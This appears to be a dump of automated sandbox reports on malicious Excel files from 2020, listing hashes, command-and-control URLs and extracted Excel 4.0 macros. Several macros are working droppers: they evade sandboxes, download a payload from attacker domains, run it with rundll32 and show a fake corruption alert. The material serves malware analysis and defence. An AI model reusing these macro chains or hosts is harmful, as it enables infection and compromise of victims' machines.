{"version":"0.2","sample":{"sample":"","kind":"file","target":"53f56dd795ddca38a4f06342b0afbe55d5cb9a66520c324bf42621ca5fd48b40"},"analysis":{"reported":"2020-04-09T16:16:20Z","score":10},"files":[{"filename":"53f56dd795ddca38a4f06342b0afbe55d5cb9a66520c324bf42621ca5fd48b40","filesize":112128,"md5":"9f872dc7c5267a4a1fe6a0d2118d3e27","sha1":"682befec382162953668602f6189527a46e6ff4b","sha256":"53f56dd795ddca38a4f06342b0afbe55d5cb9a66520c324bf42621ca5fd48b40","sha512":"ca0185b830bd72f9707338a4d121c98e057d605ead0594e126754c6afb9bc59e6d682ad5dafa8a660116eb87bb9d68bfbfc1d3ef756df8cca0d04db242a616c8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"53f56dd795ddca38a4f06342b0afbe55d5cb9a66520c324bf42621ca5fd48b40.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"53f57ffbd6b38212ee4002a0c279f82714d817d3ec54309d0d547b2c6a3e8c65"},"analysis":{"reported":"2020-04-09T16:16:20Z","score":10},"files":[{"filename":"53f57ffbd6b38212ee4002a0c279f82714d817d3ec54309d0d547b2c6a3e8c65","filesize":206336,"md5":"9d083eca1ab0858bc44055b5cf50c284","sha1":"aca1fe403670a3ba5f7cc44580b3a5caeaeff3d1","sha256":"53f57ffbd6b38212ee4002a0c279f82714d817d3ec54309d0d547b2c6a3e8c65","sha512":"6c08ef75dddb08a6fa4f227d7ba9bce59a5637f4d1fc20aed48b702463bcfd0e850c9fd487ef7b9289ca028aeb6a7dbd656aaf2323214d36d0c63c82d42070c6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"53f57ffbd6b38212ee4002a0c279f82714d817d3ec54309d0d547b2c6a3e8c65.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"tJUcdDNWgC\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"540348f1b6e2bd5e402d697a610149f122af2af91cf0f9bab0f6f85c2b942544"},"analysis":{"reported":"2020-04-09T16:16:20Z","score":10},"files":[{"filename":"540348f1b6e2bd5e402d697a610149f122af2af91cf0f9bab0f6f85c2b942544","filesize":185344,"md5":"1ed52ee750aa19b425a70877bfe287db","sha1":"dc70df4089c29936cd155aa9c0016eb93ffa4529","sha256":"540348f1b6e2bd5e402d697a610149f122af2af91cf0f9bab0f6f85c2b942544","sha512":"7ae5fb6b74f4f2a867cd1c2c40e3dab5eb4b4f65977e884bfde1d6f89e1029e21c56230dde0477d8dad3e9b75092332562f6ea1c1dc5d2a56696a48bec72792a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"540348f1b6e2bd5e402d697a610149f122af2af91cf0f9bab0f6f85c2b942544.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"540aeb8a174b4155739384fb4bc7e46b041e91e3c07ca526e5a29f8fa455f22a"},"analysis":{"reported":"2020-04-09T16:16:20Z","score":10},"files":[{"filename":"540aeb8a174b4155739384fb4bc7e46b041e91e3c07ca526e5a29f8fa455f22a","filesize":206336,"md5":"f188704136ae67e70170b8c88a3b1156","sha1":"dc1476d75ac29255af2824372c1ef066b471f72c","sha256":"540aeb8a174b4155739384fb4bc7e46b041e91e3c07ca526e5a29f8fa455f22a","sha512":"d3fba5166ac204df0f027ee50f641cf96568a87ccbf13bd2fe3dcbb7163ed701ab5994224433b2d6297d7a43432e3d08bac7e9bbdcdfdcdb6650d140766a40e9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"540aeb8a174b4155739384fb4bc7e46b041e91e3c07ca526e5a29f8fa455f22a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"GIaWA3tiG0\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"540d3e176652940988cd452423f7f6c0b39f62df14942386c56f58b0274e1fee"},"analysis":{"reported":"2020-04-09T16:16:20Z","score":10},"files":[{"filename":"540d3e176652940988cd452423f7f6c0b39f62df14942386c56f58b0274e1fee","filesize":152576,"md5":"5b940d9010b5f127380dee476b2837ea","sha1":"8b8d0d6bf6086c30eb386c57d8ed49e588840c0d","sha256":"540d3e176652940988cd452423f7f6c0b39f62df14942386c56f58b0274e1fee","sha512":"0b71e4abfa6bdc032e7e7ff09ad2567daaa4f70568d8d5b3d50251050a79a270d398dd58513d8d8a322c1d9149fec18f86ef6919fb37c5f7cd7dcc7491bc997a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"540d3e176652940988cd452423f7f6c0b39f62df14942386c56f58b0274e1fee.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"d08k41QMio\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"540f5500ad4e6c73658ce832d1e24f744f71b1fbf828c96104e25471d7239e22"},"analysis":{"reported":"2020-04-09T16:16:20Z","score":10},"files":[{"filename":"540f5500ad4e6c73658ce832d1e24f744f71b1fbf828c96104e25471d7239e22","filesize":209408,"md5":"96d42de273fbc44f1419956dc2862133","sha1":"adc1a431431d4c4eeae29ff1ea311a897b784be4","sha256":"540f5500ad4e6c73658ce832d1e24f744f71b1fbf828c96104e25471d7239e22","sha512":"11217b2ff7131e6095c4aa3539705fd77d3fd47bf2ccfadd6a5c37fb643029208200725136e33c38e8f440db19357163f39d01efc5223969439506a5994f2acf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"540f5500ad4e6c73658ce832d1e24f744f71b1fbf828c96104e25471d7239e22.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"QYdzINTXEP\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"54238df69c0cc67fda0cb815451c0bd986c0b1303a4d733043ebcb979bf555d3"},"analysis":{"reported":"2020-04-09T16:16:20Z","score":10},"files":[{"filename":"54238df69c0cc67fda0cb815451c0bd986c0b1303a4d733043ebcb979bf555d3","filesize":132608,"md5":"2c87c2a939c9c88c535a683fd8ad6347","sha1":"cacd366e25aac502f00634f6a8a97c9c33124235","sha256":"54238df69c0cc67fda0cb815451c0bd986c0b1303a4d733043ebcb979bf555d3","sha512":"2f0d07b897c8f028f7997dee33438a65dcdc701cf96324ea59e045028d63643d14235452076b9bbfc829c8c63a0e4d7737f7b6a162b3a2dae6b87235ffa1bbbc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"54238df69c0cc67fda0cb815451c0bd986c0b1303a4d733043ebcb979bf555d3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rosannahtacey.xyz/vg43"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rosannahtacey.xyz/vg43\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"vqB5qP6A5H\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"543d2c6bd7a8229d2dafd45651e3eedd967aefe2a17c2d6b220bfbdc22073a42"},"analysis":{"reported":"2020-04-09T16:16:20Z","score":10},"files":[{"filename":"543d2c6bd7a8229d2dafd45651e3eedd967aefe2a17c2d6b220bfbdc22073a42","filesize":141824,"md5":"fed038017a426fb87e91c4effba25bf2","sha1":"df6393da0d73c8b93bfd19096dd10e6232ace879","sha256":"543d2c6bd7a8229d2dafd45651e3eedd967aefe2a17c2d6b220bfbdc22073a42","sha512":"be91370097f6982eec75dbd84d77548315ce98a1845c6f1408b2ca212dc3b3ab8ce636dfc19399ed9034522b1c1efab62db89c43f99943892197f041684bc401","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"543d2c6bd7a8229d2dafd45651e3eedd967aefe2a17c2d6b220bfbdc22073a42.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"Jsa1xTmTaz\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"54431a248554022bd683766371d861d779092f5a203e5ee5ebefbb25f16b6d29"},"analysis":{"reported":"2020-04-09T16:16:20Z","score":10},"files":[{"filename":"54431a248554022bd683766371d861d779092f5a203e5ee5ebefbb25f16b6d29","filesize":113664,"md5":"9915ccff0761a7eddc75c77bd7a7aadf","sha1":"d134d5662c4b66f0fc15ad2fcb183b61bab8669b","sha256":"54431a248554022bd683766371d861d779092f5a203e5ee5ebefbb25f16b6d29","sha512":"3ba7c312343058409bddc7dfdb76b450bfe0d9096172c9b9bd53411c0a7397934b5a771d11a3b5e26fb5b7af310edf6fc0f2d57ace0b7f0769ee8e8b6e1f2de7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"54431a248554022bd683766371d861d779092f5a203e5ee5ebefbb25f16b6d29.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ojfjsT2kZb\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5450971b5bbc7dc427c83811c2bda49805eff6818295419b79e87efb083ab0b7"},"analysis":{"reported":"2020-04-09T16:16:20Z","score":10},"files":[{"filename":"5450971b5bbc7dc427c83811c2bda49805eff6818295419b79e87efb083ab0b7","filesize":185344,"md5":"7abeab323ba57d6249547398826dd4f1","sha1":"3910ac6df6be602bb96cdded5ba5aa678c9a0f30","sha256":"5450971b5bbc7dc427c83811c2bda49805eff6818295419b79e87efb083ab0b7","sha512":"3878da7cdbc2def188ed7753db33f8bd8c2e8b30998d0947eec4eca556f9ae1f1f69e8a81f2934c3b45ae0907a3ff8a8668a3f6d6229df17d378e029317994d3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5450971b5bbc7dc427c83811c2bda49805eff6818295419b79e87efb083ab0b7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"545cc39438f8d6497c1e03a142d718fe5a642cc47f1fd9880810bd4e1a872195"},"analysis":{"reported":"2020-04-09T16:16:20Z","score":10},"files":[{"filename":"545cc39438f8d6497c1e03a142d718fe5a642cc47f1fd9880810bd4e1a872195","filesize":167936,"md5":"0654649d82e07106ba1f35481e9d70d6","sha1":"bac2770a3bb5014897501ceca3cab42c6784897c","sha256":"545cc39438f8d6497c1e03a142d718fe5a642cc47f1fd9880810bd4e1a872195","sha512":"2df9573b865d46df113e7a8c5bb132425f9654564f7751e4ff4b8523dcf6c473e9398392297b7ac07f641790c3e81acf8fbea41e2bb926ed84580d9b2c26bf6b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"545cc39438f8d6497c1e03a142d718fe5a642cc47f1fd9880810bd4e1a872195.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"encY0pn9iA\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5490564ad3455febebe7fe44b9007690e084ec65af65e5896498dad30246d172"},"analysis":{"reported":"2020-04-09T16:16:20Z","score":10},"files":[{"filename":"5490564ad3455febebe7fe44b9007690e084ec65af65e5896498dad30246d172","filesize":185344,"md5":"e7f587484aedfd3e5dacff7cd06dcff1","sha1":"76c8b87297ddfae413cb7dd08425e253d2a4adeb","sha256":"5490564ad3455febebe7fe44b9007690e084ec65af65e5896498dad30246d172","sha512":"f61c3ca0c2759b4992b18ad83477bf8da98a4fd668ee47869f5e33d1fac6a57c406573f24f8330c08617d6da3d6be2071c4aa949ca89e069a74c89f52472c836","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5490564ad3455febebe7fe44b9007690e084ec65af65e5896498dad30246d172.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/DSKVJBdsj2"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"549fa7919baa7dabda46860ffcaf5f8cd4c3e9520d6f163652d15f1e988683c1"},"analysis":{"reported":"2020-04-09T16:16:20Z","score":10},"files":[{"filename":"549fa7919baa7dabda46860ffcaf5f8cd4c3e9520d6f163652d15f1e988683c1","filesize":104448,"md5":"11d1369d00d6489dcb9e507812fe60d6","sha1":"86ac7c5a6b954d6d15170b8dc5ed54441f26f88d","sha256":"549fa7919baa7dabda46860ffcaf5f8cd4c3e9520d6f163652d15f1e988683c1","sha512":"a51079a0b54a4111406df22dd0ff09a324da07d88aebd6f76f34c996471d06ed041b78c8f6b88375523192094a7e0164f4f6ea2d9be6f27cb31d58c2c436263e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"549fa7919baa7dabda46860ffcaf5f8cd4c3e9520d6f163652d15f1e988683c1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"dwKYQ0qKkP\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"54bd46105067f2698e8f3fa011fe4b69e09062e5745f411ac10d5b17a2401ab4"},"analysis":{"reported":"2020-04-09T16:16:20Z","score":10},"files":[{"filename":"54bd46105067f2698e8f3fa011fe4b69e09062e5745f411ac10d5b17a2401ab4","filesize":185344,"md5":"1ff86e8553472ed6fc11812f902bce51","sha1":"761b6ed3bf6e60e3051a84ab83ee46ff108bf332","sha256":"54bd46105067f2698e8f3fa011fe4b69e09062e5745f411ac10d5b17a2401ab4","sha512":"0e070460e0025b43de5885eff5d7b8ac3a4ef85be0fd961d235fd1d0b24d11253ee68d323d27e5379e264aee071a3c5b3f6d019059f7a69161e6f7ce7e0973aa","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"54bd46105067f2698e8f3fa011fe4b69e09062e5745f411ac10d5b17a2401ab4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"54cae3b31b899f5d041c3b19cebfb9af07d489d5849235cc7dc5a04e40a76aa7"},"analysis":{"reported":"2020-04-09T16:16:20Z","score":10},"files":[{"filename":"54cae3b31b899f5d041c3b19cebfb9af07d489d5849235cc7dc5a04e40a76aa7","filesize":167936,"md5":"29b52b3e97bc36a27d73d9fcc491561b","sha1":"05d0e3e16a5493e0bc2e10d93e519c3855aa97db","sha256":"54cae3b31b899f5d041c3b19cebfb9af07d489d5849235cc7dc5a04e40a76aa7","sha512":"26333c6c73ef4c4f04d0d56a2541d868c7dd64dbfdd94dce3e322d7423c42228f63340d2bd335a1da278906b1d49f587d1511e04d4541c9085ed2f45173ae919","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"54cae3b31b899f5d041c3b19cebfb9af07d489d5849235cc7dc5a04e40a76aa7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"0C5TqUcztx\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"54cbbe071a6b38f0254a559592679a19152e51fd731dcd0102ec5f4a29356d1a"},"analysis":{"reported":"2020-04-09T16:16:21Z","score":10},"files":[{"filename":"54cbbe071a6b38f0254a559592679a19152e51fd731dcd0102ec5f4a29356d1a","filesize":185344,"md5":"c511fe3cdcbee6111511f68dd741fea4","sha1":"81106237e9bf9f0ce554d43210c5fff38852de2c","sha256":"54cbbe071a6b38f0254a559592679a19152e51fd731dcd0102ec5f4a29356d1a","sha512":"3d1a23758f498d10126388bef2e2e531c178bfe88151950ae423da693065024be1de1f6806c7ebdf03878c56b390ed26871763b975c8ccdfc1a5f23f019feaef","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"54cbbe071a6b38f0254a559592679a19152e51fd731dcd0102ec5f4a29356d1a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"54e39e46359e28d6ffc22c67426c9ef014c25012397ecb8316cb7de59d0b2a02"},"analysis":{"reported":"2020-04-09T16:16:21Z","score":10},"files":[{"filename":"54e39e46359e28d6ffc22c67426c9ef014c25012397ecb8316cb7de59d0b2a02","filesize":167936,"md5":"fba3324959f6faa4fa5802957d153773","sha1":"1889c73801e494a325908f59172ede1f87fa2074","sha256":"54e39e46359e28d6ffc22c67426c9ef014c25012397ecb8316cb7de59d0b2a02","sha512":"0d84198093ab69c478fe82ca4e1e5d7415af40565cb445bfc1da0fa81f64ec38f2c2886accb3b43eb93f1c2ff8fd858dfd29731d46e0ed4814951024e7f36e71","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"54e39e46359e28d6ffc22c67426c9ef014c25012397ecb8316cb7de59d0b2a02.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, 